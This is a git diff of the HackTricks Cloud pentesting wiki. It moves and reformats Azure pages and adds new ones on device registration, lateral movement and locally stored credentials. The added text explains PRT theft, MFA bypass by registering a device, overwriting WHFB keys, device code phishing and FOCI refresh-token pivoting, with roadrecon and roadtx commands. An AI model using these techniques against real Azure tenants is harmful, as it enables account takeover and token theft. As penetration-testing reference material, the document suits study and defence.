       "effect": "Deny"
@@ -380,7 +360,7 @@ In Azure **permissions are can be assigned to any part of the hierarchy**. That
 
 This hierarchical structure allows for efficient and scalable management of access permissions.
 
-

+

 
 ### Azure RBAC vs ABAC
 
@@ -392,23 +372,10 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond
 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview)
-* [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions)
-* [https://abouttmc.com/glossary/azure-subscription/#:\~:text=An%20Azure%20subscription%20is%20a,the%20subscription%20it%20belongs%20to.](https://abouttmc.com/glossary/azure-subscription/)
-* [https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource)
-* [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration)
+- [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview)
+- [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions)
+- [https://abouttmc.com/glossary/azure-subscription/#:\~:text=An%20Azure%20subscription%20is%20a,the%20subscription%20it%20belongs%20to.](https://abouttmc.com/glossary/azure-subscription/)
+- [https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource)
+- [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
similarity index 62%
rename from pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
rename to src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
index 59ef23f06..c244928d3 100644
--- a/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
+++ b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
@@ -1,21 +1,6 @@
 # Az - Tokens & Public Applications
 
-
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -32,41 +17,40 @@ Entra ID is Microsoft's cloud-based identity and access management (IAM) platfor
 
 **Scopes and Consent:**
 
-* **Scopes:** Granular permissions defined on the resource server that specify access levels.
-* **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes.
+- **Scopes:** Granular permissions defined on the resource server that specify access levels.
+- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes.
 
 **Microsoft 365 Integration:**
 
-* Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications.
-* These applications are deeply integrated and often have interdependent service relationships.
-* To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications.
-* **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l.
-* These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces.
+- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications.
+- These applications are deeply integrated and often have interdependent service relationships.
+- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications.
+- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l.
+- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces.
 
 **Client Application Types:**
 
 1. **Confidential Clients:**
-   * Possess their own credentials (e.g., passwords or certificates).
-   * Can **securely authenticate themselves** to the authorization server.
+   - Possess their own credentials (e.g., passwords or certificates).
+   - Can **securely authenticate themselves** to the authorization server.
 2. **Public Clients:**
-   * Do not have unique credentials.
-   * Cannot securely authenticate to the authorization server.
-   * **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application.
+   - Do not have unique credentials.
+   - Cannot securely authenticate to the authorization server.
+   - **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application.
 
 ## Authentication Tokens
 
 There are **three types of tokens** used in OIDC:
 
-* [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default.
-* **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**.
-* **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens).
-  * A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**.
-  * A refresh token is encrypted and only Microsoft can decrypt it.
-  * Getting a new refresh token doesn't revoke the previous refresh token.
+- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default.
+- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**.
+- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens).
+  - A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**.
+  - A refresh token is encrypted and only Microsoft can decrypt it.
+  - Getting a new refresh token doesn't revoke the previous refresh token.
 
-{% hint style="warning" %}
-Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**.
-{% endhint %}
+> [!WARNING]
+> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**.
 
 ### Access Tokens "aud"
 
@@ -74,34 +58,33 @@ The field indicated in the "aud" field is the **resource server** (the applicati
 
 The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token:
 
-{% hint style="danger" %}
-Note that the following are just the APIs supported by `az account get-access-token` but there are more.
-{% endhint %}
+> [!CAUTION]
+> Note that the following are just the APIs supported by `az account get-access-token` but there are more.
 
 

 
 aud examples
 
-* **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD).
-  * `https://graph.windows.net/`
+- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD).
+  - `https://graph.windows.net/`
 
-- **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more.
-  * `https://management.core.windows.net/ or https://management.azure.com/`
+* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more.
+  - `https://management.core.windows.net/ or https://management.azure.com/`
 
-* **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud.
-  * `https://batch.core.windows.net/`
+- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud.
+  - `https://batch.core.windows.net/`
 
-- **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service.
-  * `https://datalake.azure.net/`
+* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service.
+  - `https://datalake.azure.net/`
 
-* **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content.
-  * `https://rest.media.azure.net`
+- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content.
+  - `https://rest.media.azure.net`
 
-- **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services.
-  * `https://graph.microsoft.com`
+* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services.
+  - `https://graph.microsoft.com`
 
-* **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB.
-  * `https://ossrdbms-aad.database.windows.net`
+- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB.
+  - `https://ossrdbms-aad.database.windows.net`
 
 

 
@@ -155,10 +138,10 @@ pprint(decoded_access_token)
 # GET NEW ACCESS TOKEN AND REFRESH TOKEN
 new_azure_cli_bearer_tokens_for_graph_api = (
     # Same client as original authorization
-    azure_cli_client.acquire_token_by_refresh_token( 
+    azure_cli_client.acquire_token_by_refresh_token(
         azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
         # Same scopes as original authorization
-        scopes=["https://graph.microsoft.com/.default"], 
+        scopes=["https://graph.microsoft.com/.default"],
     )
 )
 pprint(new_azure_cli_bearer_tokens_for_graph_api)
@@ -182,14 +165,14 @@ Following with the previous example code, in this code it's requested a new toke
 # Code from https://github.com/secureworks/family-of-client-ids-research
 azure_cli_bearer_tokens_for_outlook_api = (
     # Same client as original authorization
-    azure_cli_client.acquire_token_by_refresh_token( 
+    azure_cli_client.acquire_token_by_refresh_token(
         new_azure_cli_bearer_tokens_for_graph_api.get(
-            "refresh_token" 
+            "refresh_token"
         ),
         # But different scopes than original authorization
         scopes=[
-            "https://outlook.office.com/.default" 
-        ],  
+            "https://outlook.office.com/.default"
+        ],
     )
 )
 pprint(azure_cli_bearer_tokens_for_outlook_api)
@@ -215,19 +198,6 @@ pprint(microsoft_office_bearer_tokens_for_graph_api)
 
 ## References
 
-* [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research)
+- [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-device-registration.md b/src/pentesting-cloud/azure-security/az-device-registration.md
new file mode 100644
index 000000000..f3e004fac
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-device-registration.md
@@ -0,0 +1,109 @@
+# Az - Device Registration
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+When a device joins AzureAD a new object is created in AzureAD.
+
+When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt.
+
+Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible.
+
+Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).:
+
+```bash
+dsregcmd /status
+```
+
+After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.**
+
+For more information about what is a PRT check:
+
+{{#ref}}
+az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
+{{#endref}}
+
+### TPM - Trusted Platform Module
+
+The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\
+But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights.
+
+If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys):
+
+{{#ref}}
+az-lateral-movement-cloud-on-prem/pass-the-prt.md
+{{#endref}}
+
+## Registering a device with SSO tokens
+
+It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it:
+
+```bash
+# Initialize SSO flow
+roadrecon auth prt-init
+.\ROADtoken.exe 
+
+# Request token with PRT with PRT cookie
+roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie 
+
+# Custom pyhton script to register a device (check roadtx)
+registerdevice.py
+```
+
+Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**.
+
+> [!TIP]
+> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**.
+
+> [!CAUTION]
+> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
+
+## Overwriting a device ticket
+
+It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A).
+
+

+
+> [!CAUTION]
+> However, this was fixed.
+
+## Overwrite WHFB key
+
+[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
+
+Attack summary:
+
+- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO
+- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key
+- This also provides **persistence**
+
+

+
+Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph.
+
+Then, it's possible to generate a new key with:
+
+```bash
+roadtx genhellokey -d  -k tempkey.key
+```
+
+and then PATCH the information of the searchableDeviceKey:
+
+

+
+It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check:
+
+{{#ref}}
+az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
+{{#endref}}
+
+

+
+## References
+
+- [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A)
+- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
+- [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY)
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-enumeration-tools.md b/src/pentesting-cloud/azure-security/az-enumeration-tools.md
similarity index 68%
rename from pentesting-cloud/azure-security/az-enumeration-tools.md
rename to src/pentesting-cloud/azure-security/az-enumeration-tools.md
index 68629756c..4ada66e88 100644
--- a/pentesting-cloud/azure-security/az-enumeration-tools.md
+++ b/src/pentesting-cloud/azure-security/az-enumeration-tools.md
@@ -1,44 +1,30 @@
 # Az - Enumeration Tools
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Install PowerShell in Linux
 
-{% hint style="success" %}
-In linux you will need to install PowerShell Core:
-
-```bash
-sudo apt-get update
-sudo apt-get install -y wget apt-transport-https software-properties-common
-
-# Ubuntu 20.04
-wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
-
-# Update repos
-sudo apt-get update
-sudo add-apt-repository universe
-
-# Install & start powershell
-sudo apt-get install -y powershell
-pwsh
-
-# Az cli
-curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
-```
-{% endhint %}
+> [!TIP]
+> In linux you will need to install PowerShell Core:
+>
+> ```bash
+> sudo apt-get update
+> sudo apt-get install -y wget apt-transport-https software-properties-common
+>
+> # Ubuntu 20.04
+> wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
+>
+> # Update repos
+> sudo apt-get update
+> sudo add-apt-repository universe
+>
+> # Install & start powershell
+> sudo apt-get install -y powershell
+> pwsh
+>
+> # Az cli
+> curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
+> ```
 
 ## Install PowerShell in MacOS
 
@@ -89,8 +75,9 @@ az account management-group list --output table --debug
 
 In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
 
-{% tabs %}
-{% tab title="Bash" %}
+{{#tabs }}
+{{#tab name="Bash" }}
+
 ```bash
 export ADAL_PYTHON_SSL_NO_VERIFY=1
 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -103,17 +90,20 @@ export HTTP_PROXY="http://127.0.0.1:8080"
 openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
 export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
 ```
-{% endtab %}
 
-{% tab title="PS" %}
+{{#endtab }}
+
+{{#tab name="PS" }}
+
 ```bash
 $env:ADAL_PYTHON_SSL_NO_VERIFY=1
 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
 $env:HTTPS_PROXY="http://127.0.0.1:8080"
 $env:HTTP_PROXY="http://127.0.0.1:8080"
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Az PowerShell
 
@@ -153,8 +143,7 @@ Get-MgUser -Debug
 
 The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID.
 
-{% hint style="success" %}
-This is replaced by Microsoft Graph PowerShell
-{% endhint %}
+> [!TIP]
+> This is replaced by Microsoft Graph PowerShell
 
 Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD).
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md
new file mode 100644
index 000000000..d2cac1174
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md
@@ -0,0 +1,65 @@
+# Az - Lateral Movement (Cloud - On-Prem)
+
+## Az - Lateral Movement (Cloud - On-Prem)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+### On-Prem machines connected to cloud
+
+There are different ways a machine can be connected to the cloud:
+
+#### Azure AD joined
+
+

+
+#### Workplace joined
+
+
https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large

+
+#### Hybrid joined
+
+
https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large

+
+#### Workplace joined on AADJ or Hybrid
+
+
https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large

+
+### Tokens and limitations 
+
+In Azure AD, there are different types of tokens with specific limitations:
+
+- **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource.
+- **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications.
+- **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device.
+- **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens.
+
+The most interesting type of token is the Primary Refresh Token (PRT).
+
+{{#ref}}
+az-primary-refresh-token-prt.md
+{{#endref}}
+
+### Pivoting Techniques
+
+From the **compromised machine to the cloud**:
+
+- [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login
+- [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text.
+- [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it
+- [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it.
+- [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another
+
+From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**:
+
+- [**Azure AD Connect**](azure-ad-connect-hybrid-identity/)
+- **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md)
+
+#### [Roadtx](https://github.com/dirkjanm/ROADtools)
+
+This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/)
+
+## References
+
+- [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
similarity index 63%
rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
index 293feeb63..c2278da14 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
@@ -1,19 +1,6 @@
 # Az - Arc vulnerable GPO Deploy Script
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ### Identifying the Issues
 
@@ -79,19 +66,6 @@ At this point, we can gather the remaining information needed to connect to Azur
 
 ## References
 
-* [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
+- [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
new file mode 100644
index 000000000..e77b338ab
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
@@ -0,0 +1,39 @@
+# Az - Local Cloud Credentials
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Local Token Storage and Security Considerations
+
+### Azure CLI (Command-Line Interface)
+
+Tokens and sensitive data are stored locally by Azure CLI, raising security concerns:
+
+1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`.
+2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details.
+3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as:
+   - Executed commands with credentials embedded.
+   - URLs accessed using tokens, potentially revealing sensitive information.
+
+### Azure PowerShell
+
+Azure PowerShell also stores tokens and sensitive data, which can be accessed locally:
+
+1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext.
+2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`.
+3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access.
+
+## Automatic Tools to find them
+
+- [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe)
+- [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1)
+
+## Security Recommendations
+
+Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by:
+
+- Limiting access rights to these files.
